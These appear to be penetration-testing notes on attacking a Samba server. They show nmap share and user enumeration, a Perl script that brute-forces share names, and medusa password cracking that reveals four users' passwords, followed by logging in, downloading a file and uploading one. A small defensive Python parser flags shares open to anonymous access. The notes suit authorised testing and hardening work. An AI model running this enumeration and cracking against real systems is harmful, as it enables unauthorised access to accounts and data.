Finding open smb shares with NMAP
Nmap allows us to probe for possibly open SMB shares using its scripting engine (NSE) and the `smb-enum-shares` script.
```
root@asus:~/unix% nmap -T4 -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 48.21.33.124

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-24 10:17 MDT
Nmap scan report for srv01.acme.com (48.21.33.124)
Host is up (0.00013s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: username
|   IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (asus server (Samba, Ubuntu))
|     Users: 2
|     Max Users:
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users:
|     Path: C:\var\lib\samba\printers
|     Anonymous access:
|_    Current user access:

Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds
root@asus:~/unix%
```
Nmap reports two shares (`IPC$` and `print$`) when authenticating as the user 'username', and notes that `IPC$` allows anonymous READ/WRITE access. Next we will do the same enumeration manually and see what results we get from smbclient.
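As an added example (not part of the original notes), a small Python parser that turns the `smb-enum-shares` tree above into a table and flags any share that a null session can reach, which is the misconfiguration an administrator running this scan against their own server would want to catch first. The sample input is a constructed excerpt modelled on the scan output above, not the verbatim scan.

```python
# Constructed excerpt modelled on the smb-enum-shares output above.
SAMPLE_NMAP_OUTPUT = """\
| smb-enum-shares:
|   account_used: username
|   IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Path: C:\\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   print$:
|     Type: STYPE_DISKTREE
|     Path: C:\\var\\lib\\samba\\printers
|     Anonymous access: <none>
|_    Current user access: <none>
"""

def parse_smb_enum_shares(text: str) -> dict:
    """Turn the '|'-prefixed share tree into {share: {field: value}}.
    Share headers sit at indent 3 with no value ("IPC$:"); their fields
    are indented deeper; "|_" marks the script's last output line."""
    shares, current, in_block = {}, None, False
    for raw in text.splitlines():
        if raw.startswith("| smb-enum-shares:"):
            in_block = True
            continue
        if not in_block or not raw.startswith("|"):
            continue
        body = raw[2:] if raw.startswith("|_") else raw[1:]
        stripped = body.lstrip(" ")
        indent = len(body) - len(stripped)
        key, _, value = stripped.partition(":")
        if indent <= 3 and not value.strip():
            current = key.strip()              # new share header
            shares[current] = {}
        elif indent > 3 and current is not None:
            shares[current][key.strip()] = value.strip()
        if raw.startswith("|_"):
            break
    return shares

def flag_anonymous_access(shares: dict) -> list:
    """Report shares reachable with a null session; WRITE is the serious case."""
    findings = []
    for name, fields in sorted(shares.items()):
        access = fields.get("Anonymous access", "").upper()
        level = "WRITE" if "WRITE" in access else "READ" if "READ" in access else None
        if level:
            findings.append(f"{name}: anonymous {level} via {fields.get('Path', '?')}")
    return findings
```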
Listing remote shares
```
root@asus:~/pentest_notes% smbclient -L //srv01.acme.com -N
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

	Sharename       Type      Comment
	---------       ----      -------
	homes           Disk      Home Directories
	IPC$            IPC       IPC Service (asus server (Samba, Ubuntu))
	print$          Disk      Printer Drivers
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

	Server               Comment
	---------            -------
	ASUS                 asus server (Samba, Ubuntu)

	Workgroup            Master
	---------            -------
	WORKGROUP            ASUS
root@asus:~/pentest_notes%
```
If we try to connect to the 'homes' share directly, we get this result.
```
root@asus:~/pentest_notes% smbclient //srv01.acme.com/homes -N
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
root@asus:~/pentest_notes%
```
We get an `NT_STATUS_BAD_NETWORK_NAME` error, meaning `homes` is not connectable under that name. Its comment, however, says `Home Directories`, which we will assume means each user's home directory is served as a share named after that user. Our next step will be to figure out the usernames, and therefore the share names.
Enumerating Samba users with NMAP
In order to enumerate the possible users on the system we can issue an nmap command running the `smb-enum-users` script and see if we get lucky.
```
root@asus:~/unix% nmap -sU -sS --script=smb-enum-users -p U:137,T:139 48.21.33.124

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-24 10:07 MDT
Nmap scan report for srv01.acme.com (48.21.33.124)
Host is up (0.0027s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
137/udp open  netbios-ns

Host script results:
| smb-enum-users:
|   ASUS\clare (RID: 1001)
|     Full name:   clare chapman
|     Description:
|     Flags:       Normal user account
|   ASUS\hayden (RID: 1002)
|     Full name:   hayden sutton
|     Description:
|     Flags:       Normal user account
|   ASUS\jared (RID: 1003)
|     Full name:   jared beck
|     Description:
|     Flags:       Normal user account
|   ASUS\sam (RID: 1000)
|     Full name:   sam
|     Description:
|     Flags:       Normal user account
|   ASUS\sasha (RID: 1004)
|     Full name:   sasha kim
|     Description:
|     Flags:       Normal user account
|   ASUS\vance (RID: 1005)
|     Full name:   vance perkins
|     Description:
|_    Flags:       Normal user account

Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
root@asus:~/unix%
```
As you can see, we found the users on the remote system. Our next step is to verify that the corresponding shares exist.
Enumerating possible shares via brute force
If we do not know any of the names of the shares under Home Directories, we need to use a dictionary attack against the remote machine to uncover common share names. For this we can write a small Perl script that uses the smbclient tool to check whether a share exists. We will use a list of common first names as our wordlist.
```perl
#!/usr/bin/env perl
use strict;
use warnings;
##
## Dictionary attack against a Samba server using smbclient:
## try to uncover common user shares.
##
my $host     = "48.21.33.124";
my $filename = "common-names.txt";

open(my $fh, '<', $filename) or die "Cannot open $filename: $!";
while (my $word = <$fh>) {
    chomp($word);
    next if $word eq '';    # skip blank lines in the wordlist

    ## Try to connect to the share with no password
    my $result = qx( smbclient //$host/$word -N 2>/dev/null );

    ## NT_STATUS_ACCESS_DENIED means the share exists
    ## NT_STATUS_BAD_NETWORK_NAME means the share does not exist
    if ($result =~ /NT_STATUS_ACCESS_DENIED/) {
        print "[+] Share Found @ //$host/$word\n";
    }
}
close($fh);
```
```
root@asus:~/pentest_notes% ./smbclient-share-brute.pl
[+] Share Found @ //48.21.33.124/clare
[+] Share Found @ //48.21.33.124/hayden
[+] Share Found @ //48.21.33.124/jared
[+] Share Found @ //48.21.33.124/sam
[+] Share Found @ //48.21.33.124/sasha
[+] Share Found @ //48.21.33.124/vance
root@asus:~/pentest_notes%
```
As you can see, we found some valid shares on the remote machine that we can try to connect to. But first we need to check whether these shares require a password or allow anonymous browsing. We can issue the following command to check if authentication is needed for the share in question.
```
root@asus:~/pentest_notes% smbclient //srv01.acme.com/hayden -U hayden -N
Enter hayden's password:
tree connect failed: NT_STATUS_ACCESS_DENIED
root@asus:~/pentest_notes%
```
The share does not allow anonymous browsing with a blank password.
Cracking share passwords
Once we have found some valid share names, we can try to crack the passwords of the associated accounts to gain access. For this we will use the tool 'medusa' with the rockyou wordlist.
```
root@asus:~% medusa -M smbnt -v 4 -b -h srv01.acme.com -U smb-users.txt -P rockyou.txt
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: hayden Password: manager [SUCCESS (ADMIN$ - Share Unavailable)]
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: jared Password: attlabs [SUCCESS (ADMIN$ - Share Unavailable)]
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: sasha Password: master [SUCCESS (ADMIN$ - Share Unavailable)]
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: vance Password: sonics [SUCCESS (ADMIN$ - Share Unavailable)]
root@asus:~%
```
As you can see, we found some valid logins. Our next step is to log in with the recovered credentials and try to browse the shares.
Browsing Shares
Now that we have valid usernames and passwords for some of the users on the remote machine, we can try to access the shares. smbclient offers an interactive interface similar to the ftp client, which is easy to use.
```
root@asus:~/pentest_notes% smbclient //srv01.acme.com/hayden -U hayden
Enter hayden's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \>
```
This is what a successful login looks like. Let's now type the 'help' command to see all the commands available to us in this session.
```
smb: \> help
?              allinfo        altname        archive        backup
blocksize      cancel         case_sensitive cd             chmod
chown          close          del            dir            du
echo           exit           get            getfacl        geteas
hardlink       help           history        iosize         lcd
link           lock           lowercase      ls             l
mask           md             mget           mkdir          more
mput           newer          notify         open           posix
posix_encrypt  posix_open     posix_mkdir    posix_rmdir    posix_unlink
print          prompt         put            pwd            q
queue          quit           readlink       rd             recurse
reget          rename         reput          rm             rmdir
showacls       setea          setmode        scopy          stat
symlink        tar            tarmode        timeout        translate
unlock         volume         vuid           wdel           logon
listconnect    showconnect    tcon           tdis           tid
logoff         ..             !
smb: \>
```
As you can see, the interface is similar to that of the ftp client, so our next step is to see if we can list the directory contents of the share.
```
smb: \> ls
  .                                   D        0  Wed May 15 07:45:17 2019
  ..                                  D        0  Sat Apr 27 16:58:49 2019
  .Xdefaults                          H     1600  Sat Apr 27 16:58:15 2019
  .kodi                              DH        0  Sat Apr 27 16:58:15 2019
  .profile                            H      655  Sat Apr 27 16:58:15 2019
  .bashrc                             H     3771  Sat Apr 27 16:58:15 2019
  .xscreensaver                       H     7953  Sat Apr 27 16:58:15 2019
  .bash_logout                        H      220  Sat Apr 27 16:58:15 2019
  .local                             DH        0  Sat Apr 27 16:58:15 2019
  ftp                                DR        0  Wed May 15 07:49:46 2019
  mail                                D        0  Wed May  1 09:44:03 2019
  .mozilla                           DH        0  Sat Apr 27 16:58:15 2019
  .config                            DH        0  Sat Apr 27 16:58:15 2019

		15013808 blocks of size 1024. 2057708 blocks available
smb: \>
```
Let's try to get a file from the remote share.
```
smb: \> get .profile
getting file \.profile of size 655 as .profile (23.7 KiloBytes/sec) (average 23.7 KiloBytes/sec)
smb: \>
```
Let's try and see if we have write access to the remote share.
```
smb: \> put server.pl
putting file server.pl as \server.pl (25.2 kb/s) (average 25.2 kb/s)
smb: \>
```
Changing directories is easy.
```
smb: \> cd ftp
smb: \ftp\> ls
  .                                  DR        0  Wed May 15 07:49:46 2019
  ..                                  D        0  Mon Sep  2 14:54:37 2019
  fo                                  D        0  Wed May 15 07:49:41 2019
  files                               D        0  Wed May 15 07:49:46 2019

		15013808 blocks of size 1024. 2063700 blocks available
smb: \ftp\>
```